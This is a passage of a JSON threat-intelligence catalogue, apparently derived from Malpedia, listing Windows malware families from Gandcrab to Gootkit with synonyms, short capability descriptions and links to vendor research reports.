figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom", "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/", "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", "https://www.secureworks.com/research/threat-profiles/gold-garden", "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "http://asec.ahnlab.com/1145", "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html", "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", "https://vimeo.com/449849549", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/", "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" ], "synonyms": [ "GrandCrab" ], "type": [] }, "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", "value": "Gandcrab" }, { "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" ], "synonyms": [], "type": [] }, "uuid": "591b2882-65ba-4629-9008-51ed3467510a", "value": "Gaudox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" ], "synonyms": [], "type": [] }, "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", "value": "Gauss" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", "https://securelist.com/introducing-whitebear/81638/", "https://www.youtube.com/watch?v=Pvzhtjl86wc", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/", "https://github.com/eset/malware-ioc/tree/master/turla", "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" ], "synonyms": [ "WhiteBear" ], "type": [] }, "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", "value": "Gazer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" ], "synonyms": [], "type": [] }, "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", "value": "gcman" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html" ], "synonyms": [], "type": [] }, "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", "value": "GearInformer" }, { "description": "According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift", "https://content.fireeye.com/apt-41/rpt-apt41/" ], "synonyms": [], "type": [] }, "uuid": "06d80b50-703a-4cf9-989e-b8b1bf71144a", "value": "GEARSHIFT" }, { "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79", "value": "GEMCUTTER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2", "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md", "https://github.com/Tera0017/TAFOF-Unpacker", "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/", "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/", "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", "https://www.goggleheadedhacker.com/blog/post/13", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "FRIENDSPEAK", "GetandGo" ], "type": [] }, "uuid": "f6aa0163-bde3-44a2-8acc-3e7a04cf167d", "value": "Get2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", "value": "GetMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware" ], "synonyms": [ "getmypos" ], "type": [] }, "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", "value": "GetMyPass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd", "https://ihonker.org/thread-1504-1-1.html" ], "synonyms": [], "type": [] }, "uuid": "a762023d-8d46-43a8-be01-3b2362963de0", "value": "get_pwd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" ], "synonyms": [ "CoreImpact (Modified)", "Gholee" ], "type": [] }, "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", "value": "Ghole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://en.wikipedia.org/wiki/GhostNet", "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [ "Remosh" ], "type": [] }, "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", "value": "Gh0stnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" ], "synonyms": [ "Ghost iBot" ], "type": [] }, "uuid": "6201c337-1599-4ced-be9e-651a624c20be", "value": "GhostAdmin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", "https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/", "http://www.hexblog.com/?p=1248", "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", "https://www.intezer.com/blog-chinaz-relations/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html", "http://www.nartv.org/mirror/ghostnet.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", "https://blog.cylance.com/the-ghost-dragon", "https://s.tencent.com/research/report/836.html", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", "https://blog.talosintelligence.com/2019/09/panda-evolution.html", "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-globe", "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", "https://www.datanet.co.kr/news/articleView.html?idxno=133346", "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", "https://www.secureworks.com/research/threat-profiles/bronze-edison", "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", "https://risky.biz/whatiswinnti/", "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/" ], "synonyms": [ "Farfli", "Gh0st RAT", "PCRat" ], "type": [] }, "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", "value": "Ghost RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish", "https://id-ransomware.blogspot.com/2020/02/gibberish-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "f561656c-19d1-4b07-a193-3293d053e774", "value": "Gibberish Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy", "https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf" ], "synonyms": [], "type": [] }, "uuid": "6ad51e4a-b44d-43c8-9f55-b9fe06a2c06d", "value": "Giffy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ginwui", "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [], "type": [] }, "uuid": "7f768705-d852-4c66-a7e0-76fd5016d07f", "value": "Ginwui" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses" ], "synonyms": [ "Wordpress Bruteforcer" ], "type": [] }, "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", "value": "Glasses" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" ], "synonyms": [], "type": [] }, "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", "value": "GlassRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos", "https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html" ], "synonyms": [], "type": [] }, "uuid": "d2e0cbfb-c647-48ec-84e2-ca2199cf7d03", "value": "GlitchPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://isc.sans.edu/diary/23417", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://blog.ensilo.com/globeimposter-ransomware-technical", "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" ], "synonyms": [], "type": [] }, "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", "value": "GlobeImposter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" ], "synonyms": [], "type": [] }, "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", "value": "Globe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", "value": "GlooxMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", "http://resources.infosecinstitute.com/tdss4-part-1/", "https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/", "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" ], "synonyms": [], "type": [] }, "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", "value": "Glupteba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gobotkr", "https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/" ], "synonyms": [], "type": [] }, "uuid": "56060ca3-ee34-4df9-bcaa-70267d8440c1", "value": "GoBotKR" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker", "https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html", "https://twitter.com/GrujaRS/status/1254657823478353920", "https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go" ], "synonyms": [], "type": [] }, "uuid": "f93da83e-0c2f-4dc0-82c6-2fcc6339dcf2", "value": "goCryptoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12", "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" ], "synonyms": [ "GOSLU" ], "type": [] }, "uuid": "f62ad36f-e274-4fdb-b71d-887f9cd9c215", "value": "Godlike12" }, { "description": "Proof of concept for data exfiltration via DoH, written in Go.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh", "https://sensepost.com/blog/2018/waiting-for-godoh/", "https://github.com/sensepost/goDoH" ], "synonyms": [], "type": [] }, "uuid": "b54b4238-550f-42a7-9e62-d1ad5e4d3904", "value": "goDoH" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", "https://research.checkpoint.com/godzilla-loader-and-the-long-tail-of-malware/" ], "synonyms": [], "type": [] }, "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", "value": "Godzilla Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", "value": "Goggles" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle", "https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/" ], "synonyms": [ "BossiTossi" ], "type": [] }, "uuid": "034a3db0-b53c-4ec1-9390-4b6f214e1233", "value": "GoGoogle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/" ], "synonyms": [ "Petya/Mischa" ], "type": [] }, "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", "value": "GoldenEye" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/" ], "synonyms": [], "type": [] }, "uuid": "1dd854b4-d8e6-438c-a0b1-6991b8b6ff92", "value": "GoldenHelper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy", "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/", "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf", "https://www.ic3.gov/media/news/2020/200728.pdf", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/", "https://www.ic3.gov/Media/News/2020/201103-1.pdf" ], "synonyms": [], "type": [] }, "uuid": "86b8bd8d-19c5-4c7a-befd-0eb6297776bc", "value": "GoldenSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax", "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/", "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" ], "synonyms": [ "SUNSHUTTLE" ], "type": [] }, "uuid": "9a3429d7-e4a8-43c5-8786-0b3a1c841a5f", "value": "GoldMax" }, { "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" ], "synonyms": [], "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", "value": "GoldDragon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" ], "synonyms": [], "type": [] }, "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", "value": "Golroted" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer", "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April" ], "synonyms": [], "type": [] }, "uuid": "ea9a9585-2a99-42b9-a724-bf7af82bb986", "value": "Gomorrah stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", "https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" ], "synonyms": [ "Fuerboos" ], "type": [] }, "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", "value": "Goodor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1298818-6425-49be-9764-9f119d964efd", "value": "GoogleDrive RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" ], "synonyms": [], "type": [] }, "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", "value": "GooPic Drooper" }, { "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", "https://dannyquist.github.io/gootkit-reversing-ghidra/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", "https://www.certego.net/en/news/malware-tales-gootkit/", "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/", "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md", "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", "https://www.youtube.com/watch?v=242Tn0IL2jE", "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/", "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", "https://twitter.com/MsftSecIntel/status/1366542130731094021", "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/", "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", "https://www.us-cert.gov/ncas/alerts/TA16-336A", 